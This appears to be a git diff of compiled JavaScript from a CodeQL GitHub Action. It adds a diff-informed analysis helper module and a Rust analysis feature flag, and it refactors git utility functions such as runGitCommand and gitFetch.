{"version":3,"file":"dependency-caching.js","sourceRoot":"","sources":["../src/dependency-caching.ts"],"names":[],"mappings":"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"}
|
||||||
114
lib/diff-informed-analysis-utils.js
generated
Normal file
114
lib/diff-informed-analysis-utils.js
generated
Normal file
@@ -0,0 +1,114 @@
|
|||||||
|
"use strict";
|
||||||
|
var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) {
|
||||||
|
if (k2 === undefined) k2 = k;
|
||||||
|
var desc = Object.getOwnPropertyDescriptor(m, k);
|
||||||
|
if (!desc || ("get" in desc ? !m.__esModule : desc.writable || desc.configurable)) {
|
||||||
|
desc = { enumerable: true, get: function() { return m[k]; } };
|
||||||
|
}
|
||||||
|
Object.defineProperty(o, k2, desc);
|
||||||
|
}) : (function(o, m, k, k2) {
|
||||||
|
if (k2 === undefined) k2 = k;
|
||||||
|
o[k2] = m[k];
|
||||||
|
}));
|
||||||
|
var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) {
|
||||||
|
Object.defineProperty(o, "default", { enumerable: true, value: v });
|
||||||
|
}) : function(o, v) {
|
||||||
|
o["default"] = v;
|
||||||
|
});
|
||||||
|
var __importStar = (this && this.__importStar) || (function () {
|
||||||
|
var ownKeys = function(o) {
|
||||||
|
ownKeys = Object.getOwnPropertyNames || function (o) {
|
||||||
|
var ar = [];
|
||||||
|
for (var k in o) if (Object.prototype.hasOwnProperty.call(o, k)) ar[ar.length] = k;
|
||||||
|
return ar;
|
||||||
|
};
|
||||||
|
return ownKeys(o);
|
||||||
|
};
|
||||||
|
return function (mod) {
|
||||||
|
if (mod && mod.__esModule) return mod;
|
||||||
|
var result = {};
|
||||||
|
if (mod != null) for (var k = ownKeys(mod), i = 0; i < k.length; i++) if (k[i] !== "default") __createBinding(result, mod, k[i]);
|
||||||
|
__setModuleDefault(result, mod);
|
||||||
|
return result;
|
||||||
|
};
|
||||||
|
})();
|
||||||
|
Object.defineProperty(exports, "__esModule", { value: true });
|
||||||
|
exports.shouldPerformDiffInformedAnalysis = shouldPerformDiffInformedAnalysis;
|
||||||
|
exports.getDiffInformedAnalysisBranches = getDiffInformedAnalysisBranches;
|
||||||
|
exports.writeDiffRangesJsonFile = writeDiffRangesJsonFile;
|
||||||
|
exports.readDiffRangesJsonFile = readDiffRangesJsonFile;
|
||||||
|
const fs = __importStar(require("fs"));
|
||||||
|
const path = __importStar(require("path"));
|
||||||
|
const github = __importStar(require("@actions/github"));
|
||||||
|
const actionsUtil = __importStar(require("./actions-util"));
|
||||||
|
const feature_flags_1 = require("./feature-flags");
|
||||||
|
function getPullRequestBranches() {
|
||||||
|
const pullRequest = github.context.payload.pull_request;
|
||||||
|
if (pullRequest) {
|
||||||
|
return {
|
||||||
|
base: pullRequest.base.ref,
|
||||||
|
// We use the head label instead of the head ref here, because the head
|
||||||
|
// ref lacks owner information and by itself does not uniquely identify
|
||||||
|
// the head branch (which may be in a forked repository).
|
||||||
|
head: pullRequest.head.label,
|
||||||
|
};
|
||||||
|
}
|
||||||
|
// PR analysis under Default Setup does not have the pull_request context,
|
||||||
|
// but it should set CODE_SCANNING_REF and CODE_SCANNING_BASE_BRANCH.
|
||||||
|
const codeScanningRef = process.env.CODE_SCANNING_REF;
|
||||||
|
const codeScanningBaseBranch = process.env.CODE_SCANNING_BASE_BRANCH;
|
||||||
|
if (codeScanningRef && codeScanningBaseBranch) {
|
||||||
|
return {
|
||||||
|
base: codeScanningBaseBranch,
|
||||||
|
// PR analysis under Default Setup analyzes the PR head commit instead of
|
||||||
|
// the merge commit, so we can use the provided ref directly.
|
||||||
|
head: codeScanningRef,
|
||||||
|
};
|
||||||
|
}
|
||||||
|
return undefined;
|
||||||
|
}
|
||||||
|
/**
|
||||||
|
* Check if the action should perform diff-informed analysis.
|
||||||
|
*/
|
||||||
|
async function shouldPerformDiffInformedAnalysis(codeql, features, logger) {
|
||||||
|
return ((await getDiffInformedAnalysisBranches(codeql, features, logger)) !==
|
||||||
|
undefined);
|
||||||
|
}
|
||||||
|
/**
|
||||||
|
* Get the branches to use for diff-informed analysis.
|
||||||
|
*
|
||||||
|
* @returns If the action should perform diff-informed analysis, return
|
||||||
|
* the base and head branches that should be used to compute the diff ranges.
|
||||||
|
* Otherwise return `undefined`.
|
||||||
|
*/
|
||||||
|
async function getDiffInformedAnalysisBranches(codeql, features, logger) {
|
||||||
|
if (!(await features.getValue(feature_flags_1.Feature.DiffInformedQueries, codeql))) {
|
||||||
|
return undefined;
|
||||||
|
}
|
||||||
|
const branches = getPullRequestBranches();
|
||||||
|
if (!branches) {
|
||||||
|
logger.info("Not performing diff-informed analysis " +
|
||||||
|
"because we are not analyzing a pull request.");
|
||||||
|
}
|
||||||
|
return branches;
|
||||||
|
}
|
||||||
|
function getDiffRangesJsonFilePath() {
|
||||||
|
return path.join(actionsUtil.getTemporaryDirectory(), "pr-diff-range.json");
|
||||||
|
}
|
||||||
|
function writeDiffRangesJsonFile(logger, ranges) {
|
||||||
|
const jsonContents = JSON.stringify(ranges, null, 2);
|
||||||
|
const jsonFilePath = getDiffRangesJsonFilePath();
|
||||||
|
fs.writeFileSync(jsonFilePath, jsonContents);
|
||||||
|
logger.debug(`Wrote pr-diff-range JSON file to ${jsonFilePath}:\n${jsonContents}`);
|
||||||
|
}
|
||||||
|
function readDiffRangesJsonFile(logger) {
|
||||||
|
const jsonFilePath = getDiffRangesJsonFilePath();
|
||||||
|
if (!fs.existsSync(jsonFilePath)) {
|
||||||
|
logger.debug(`Diff ranges JSON file does not exist at ${jsonFilePath}`);
|
||||||
|
return undefined;
|
||||||
|
}
|
||||||
|
const jsonContents = fs.readFileSync(jsonFilePath, "utf8");
|
||||||
|
logger.debug(`Read pr-diff-range JSON file from ${jsonFilePath}:\n${jsonContents}`);
|
||||||
|
return JSON.parse(jsonContents);
|
||||||
|
}
|
||||||
|
//# sourceMappingURL=diff-informed-analysis-utils.js.map
|
||||||
1
lib/diff-informed-analysis-utils.js.map
Normal file
1
lib/diff-informed-analysis-utils.js.map
Normal file
@@ -0,0 +1 @@
|
|||||||
|
{"version":3,"file":"diff-informed-analysis-utils.js","sourceRoot":"","sources":["../src/diff-informed-analysis-utils.ts"],"names":[],"mappings":"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"}
|
||||||
9
lib/feature-flags.js
generated
9
lib/feature-flags.js
generated
@@ -68,6 +68,7 @@ var Feature;
|
|||||||
Feature["ExtractToToolcache"] = "extract_to_toolcache";
|
Feature["ExtractToToolcache"] = "extract_to_toolcache";
|
||||||
Feature["PythonDefaultIsToNotExtractStdlib"] = "python_default_is_to_not_extract_stdlib";
|
Feature["PythonDefaultIsToNotExtractStdlib"] = "python_default_is_to_not_extract_stdlib";
|
||||||
Feature["QaTelemetryEnabled"] = "qa_telemetry_enabled";
|
Feature["QaTelemetryEnabled"] = "qa_telemetry_enabled";
|
||||||
|
Feature["RustAnalysis"] = "rust_analysis";
|
||||||
Feature["ZstdBundleStreamingExtraction"] = "zstd_bundle_streaming_extraction";
|
Feature["ZstdBundleStreamingExtraction"] = "zstd_bundle_streaming_extraction";
|
||||||
})(Feature || (exports.Feature = Feature = {}));
|
})(Feature || (exports.Feature = Feature = {}));
|
||||||
exports.featureConfig = {
|
exports.featureConfig = {
|
||||||
@@ -95,8 +96,7 @@ exports.featureConfig = {
|
|||||||
[Feature.DiffInformedQueries]: {
|
[Feature.DiffInformedQueries]: {
|
||||||
defaultValue: false,
|
defaultValue: false,
|
||||||
envVar: "CODEQL_ACTION_DIFF_INFORMED_QUERIES",
|
envVar: "CODEQL_ACTION_DIFF_INFORMED_QUERIES",
|
||||||
minimumVersion: undefined,
|
minimumVersion: "2.21.0",
|
||||||
toolsFeature: tools_features_1.ToolsFeature.DatabaseInterpretResultsSupportsSarifRunProperty,
|
|
||||||
},
|
},
|
||||||
[Feature.DisableCsharpBuildless]: {
|
[Feature.DisableCsharpBuildless]: {
|
||||||
defaultValue: false,
|
defaultValue: false,
|
||||||
@@ -132,6 +132,11 @@ exports.featureConfig = {
|
|||||||
minimumVersion: undefined,
|
minimumVersion: undefined,
|
||||||
toolsFeature: tools_features_1.ToolsFeature.PythonDefaultIsToNotExtractStdlib,
|
toolsFeature: tools_features_1.ToolsFeature.PythonDefaultIsToNotExtractStdlib,
|
||||||
},
|
},
|
||||||
|
[Feature.RustAnalysis]: {
|
||||||
|
defaultValue: false,
|
||||||
|
envVar: "CODEQL_ACTION_RUST_ANALYSIS",
|
||||||
|
minimumVersion: "2.19.3",
|
||||||
|
},
|
||||||
[Feature.QaTelemetryEnabled]: {
|
[Feature.QaTelemetryEnabled]: {
|
||||||
defaultValue: false,
|
defaultValue: false,
|
||||||
envVar: "CODEQL_ACTION_QA_TELEMETRY",
|
envVar: "CODEQL_ACTION_QA_TELEMETRY",
|
||||||
|
|||||||
File diff suppressed because one or more lines are too long
126
lib/git-utils.js
generated
126
lib/git-utils.js
generated
@@ -33,7 +33,7 @@ var __importStar = (this && this.__importStar) || (function () {
|
|||||||
};
|
};
|
||||||
})();
|
})();
|
||||||
Object.defineProperty(exports, "__esModule", { value: true });
|
Object.defineProperty(exports, "__esModule", { value: true });
|
||||||
exports.decodeGitFilePath = exports.getGitDiffHunkHeaders = exports.getAllGitMergeBases = exports.gitRepack = exports.gitFetch = exports.deepenGitHistory = exports.determineBaseBranchHeadCommitOid = exports.getCommitOid = void 0;
|
exports.getFileOidsUnderPath = exports.getGitRoot = exports.decodeGitFilePath = exports.gitRepack = exports.gitFetch = exports.deepenGitHistory = exports.determineBaseBranchHeadCommitOid = exports.getCommitOid = exports.runGitCommand = void 0;
|
||||||
exports.getRef = getRef;
|
exports.getRef = getRef;
|
||||||
exports.isAnalyzingDefaultBranch = isAnalyzingDefaultBranch;
|
exports.isAnalyzingDefaultBranch = isAnalyzingDefaultBranch;
|
||||||
const core = __importStar(require("@actions/core"));
|
const core = __importStar(require("@actions/core"));
|
||||||
@@ -41,7 +41,7 @@ const toolrunner = __importStar(require("@actions/exec/lib/toolrunner"));
|
|||||||
const io = __importStar(require("@actions/io"));
|
const io = __importStar(require("@actions/io"));
|
||||||
const actions_util_1 = require("./actions-util");
|
const actions_util_1 = require("./actions-util");
|
||||||
const util_1 = require("./util");
|
const util_1 = require("./util");
|
||||||
async function runGitCommand(checkoutPath, args, customErrorMessage) {
|
const runGitCommand = async function (workingDirectory, args, customErrorMessage) {
|
||||||
let stdout = "";
|
let stdout = "";
|
||||||
let stderr = "";
|
let stderr = "";
|
||||||
core.debug(`Running git command: git ${args.join(" ")}`);
|
core.debug(`Running git command: git ${args.join(" ")}`);
|
||||||
@@ -56,7 +56,7 @@ async function runGitCommand(checkoutPath, args, customErrorMessage) {
|
|||||||
stderr += data.toString();
|
stderr += data.toString();
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
cwd: checkoutPath,
|
cwd: workingDirectory,
|
||||||
}).exec();
|
}).exec();
|
||||||
return stdout;
|
return stdout;
|
||||||
}
|
}
|
||||||
@@ -69,7 +69,8 @@ async function runGitCommand(checkoutPath, args, customErrorMessage) {
|
|||||||
core.info(`git call failed. ${customErrorMessage} Error: ${reason}`);
|
core.info(`git call failed. ${customErrorMessage} Error: ${reason}`);
|
||||||
throw error;
|
throw error;
|
||||||
}
|
}
|
||||||
}
|
};
|
||||||
|
exports.runGitCommand = runGitCommand;
|
||||||
/**
|
/**
|
||||||
* Gets the SHA of the commit that is currently checked out.
|
* Gets the SHA of the commit that is currently checked out.
|
||||||
*/
|
*/
|
||||||
@@ -82,7 +83,7 @@ const getCommitOid = async function (checkoutPath, ref = "HEAD") {
|
|||||||
// Even if this does go wrong, it's not a huge problem for the alerts to
|
// Even if this does go wrong, it's not a huge problem for the alerts to
|
||||||
// reported on the merge commit.
|
// reported on the merge commit.
|
||||||
try {
|
try {
|
||||||
const stdout = await runGitCommand(checkoutPath, ["rev-parse", ref], "Continuing with commit SHA from user input or environment.");
|
const stdout = await (0, exports.runGitCommand)(checkoutPath, ["rev-parse", ref], "Continuing with commit SHA from user input or environment.");
|
||||||
return stdout.trim();
|
return stdout.trim();
|
||||||
}
|
}
|
||||||
catch {
|
catch {
|
||||||
@@ -106,7 +107,7 @@ const determineBaseBranchHeadCommitOid = async function (checkoutPathOverride) {
|
|||||||
let commitOid = "";
|
let commitOid = "";
|
||||||
let baseOid = "";
|
let baseOid = "";
|
||||||
let headOid = "";
|
let headOid = "";
|
||||||
const stdout = await runGitCommand(checkoutPath, ["show", "-s", "--format=raw", mergeSha], "Will calculate the base branch SHA on the server.");
|
const stdout = await (0, exports.runGitCommand)(checkoutPath, ["show", "-s", "--format=raw", mergeSha], "Will calculate the base branch SHA on the server.");
|
||||||
for (const data of stdout.split("\n")) {
|
for (const data of stdout.split("\n")) {
|
||||||
if (data.startsWith("commit ") && commitOid === "") {
|
if (data.startsWith("commit ") && commitOid === "") {
|
||||||
commitOid = data.substring(7);
|
commitOid = data.substring(7);
|
||||||
@@ -141,7 +142,7 @@ exports.determineBaseBranchHeadCommitOid = determineBaseBranchHeadCommitOid;
|
|||||||
*/
|
*/
|
||||||
const deepenGitHistory = async function () {
|
const deepenGitHistory = async function () {
|
||||||
try {
|
try {
|
||||||
await runGitCommand((0, actions_util_1.getOptionalInput)("checkout_path"), [
|
await (0, exports.runGitCommand)((0, actions_util_1.getOptionalInput)("checkout_path"), [
|
||||||
"fetch",
|
"fetch",
|
||||||
"origin",
|
"origin",
|
||||||
"HEAD",
|
"HEAD",
|
||||||
@@ -163,7 +164,7 @@ exports.deepenGitHistory = deepenGitHistory;
|
|||||||
*/
|
*/
|
||||||
const gitFetch = async function (branch, extraFlags) {
|
const gitFetch = async function (branch, extraFlags) {
|
||||||
try {
|
try {
|
||||||
await runGitCommand((0, actions_util_1.getOptionalInput)("checkout_path"), ["fetch", "--no-tags", ...extraFlags, "origin", `${branch}:${branch}`], `Cannot fetch ${branch}.`);
|
await (0, exports.runGitCommand)((0, actions_util_1.getOptionalInput)("checkout_path"), ["fetch", "--no-tags", ...extraFlags, "origin", `${branch}:${branch}`], `Cannot fetch ${branch}.`);
|
||||||
}
|
}
|
||||||
catch {
|
catch {
|
||||||
// Errors are already logged by runGitCommand()
|
// Errors are already logged by runGitCommand()
|
||||||
@@ -178,68 +179,13 @@ exports.gitFetch = gitFetch;
|
|||||||
*/
|
*/
|
||||||
const gitRepack = async function (flags) {
|
const gitRepack = async function (flags) {
|
||||||
try {
|
try {
|
||||||
await runGitCommand((0, actions_util_1.getOptionalInput)("checkout_path"), ["repack", ...flags], "Cannot repack the repository.");
|
await (0, exports.runGitCommand)((0, actions_util_1.getOptionalInput)("checkout_path"), ["repack", ...flags], "Cannot repack the repository.");
|
||||||
}
|
}
|
||||||
catch {
|
catch {
|
||||||
// Errors are already logged by runGitCommand()
|
// Errors are already logged by runGitCommand()
|
||||||
}
|
}
|
||||||
};
|
};
|
||||||
exports.gitRepack = gitRepack;
|
exports.gitRepack = gitRepack;
|
||||||
/**
|
|
||||||
* Compute the all merge bases between the given refs. Returns an empty array
|
|
||||||
* if no merge base is found, or if there is an error.
|
|
||||||
*
|
|
||||||
* This function uses the `checkout_path` to determine the repository path and
|
|
||||||
* works only when called from `analyze` or `upload-sarif`.
|
|
||||||
*/
|
|
||||||
const getAllGitMergeBases = async function (refs) {
|
|
||||||
try {
|
|
||||||
const stdout = await runGitCommand((0, actions_util_1.getOptionalInput)("checkout_path"), ["merge-base", "--all", ...refs], `Cannot get merge base of ${refs}.`);
|
|
||||||
return stdout.trim().split("\n");
|
|
||||||
}
|
|
||||||
catch {
|
|
||||||
return [];
|
|
||||||
}
|
|
||||||
};
|
|
||||||
exports.getAllGitMergeBases = getAllGitMergeBases;
|
|
||||||
/**
|
|
||||||
* Compute the diff hunk headers between the two given refs.
|
|
||||||
*
|
|
||||||
* This function uses the `checkout_path` to determine the repository path and
|
|
||||||
* works only when called from `analyze` or `upload-sarif`.
|
|
||||||
*
|
|
||||||
* @returns an array of diff hunk headers (one element per line), or undefined
|
|
||||||
* if the action was not triggered by a pull request, or if the diff could not
|
|
||||||
* be determined.
|
|
||||||
*/
|
|
||||||
const getGitDiffHunkHeaders = async function (fromRef, toRef) {
|
|
||||||
let stdout = "";
|
|
||||||
try {
|
|
||||||
stdout = await runGitCommand((0, actions_util_1.getOptionalInput)("checkout_path"), [
|
|
||||||
"-c",
|
|
||||||
"core.quotePath=false",
|
|
||||||
"diff",
|
|
||||||
"--no-renames",
|
|
||||||
"--irreversible-delete",
|
|
||||||
"-U0",
|
|
||||||
fromRef,
|
|
||||||
toRef,
|
|
||||||
], `Cannot get diff from ${fromRef} to ${toRef}.`);
|
|
||||||
}
|
|
||||||
catch {
|
|
||||||
return undefined;
|
|
||||||
}
|
|
||||||
const headers = [];
|
|
||||||
for (const line of stdout.split("\n")) {
|
|
||||||
if (line.startsWith("--- ") ||
|
|
||||||
line.startsWith("+++ ") ||
|
|
||||||
line.startsWith("@@ ")) {
|
|
||||||
headers.push(line);
|
|
||||||
}
|
|
||||||
}
|
|
||||||
return headers;
|
|
||||||
};
|
|
||||||
exports.getGitDiffHunkHeaders = getGitDiffHunkHeaders;
|
|
||||||
/**
|
/**
|
||||||
* Decode, if necessary, a file path produced by Git. See
|
* Decode, if necessary, a file path produced by Git. See
|
||||||
* https://git-scm.com/docs/git-config#Documentation/git-config.txt-corequotePath
|
* https://git-scm.com/docs/git-config#Documentation/git-config.txt-corequotePath
|
||||||
@@ -285,6 +231,58 @@ const decodeGitFilePath = function (filePath) {
|
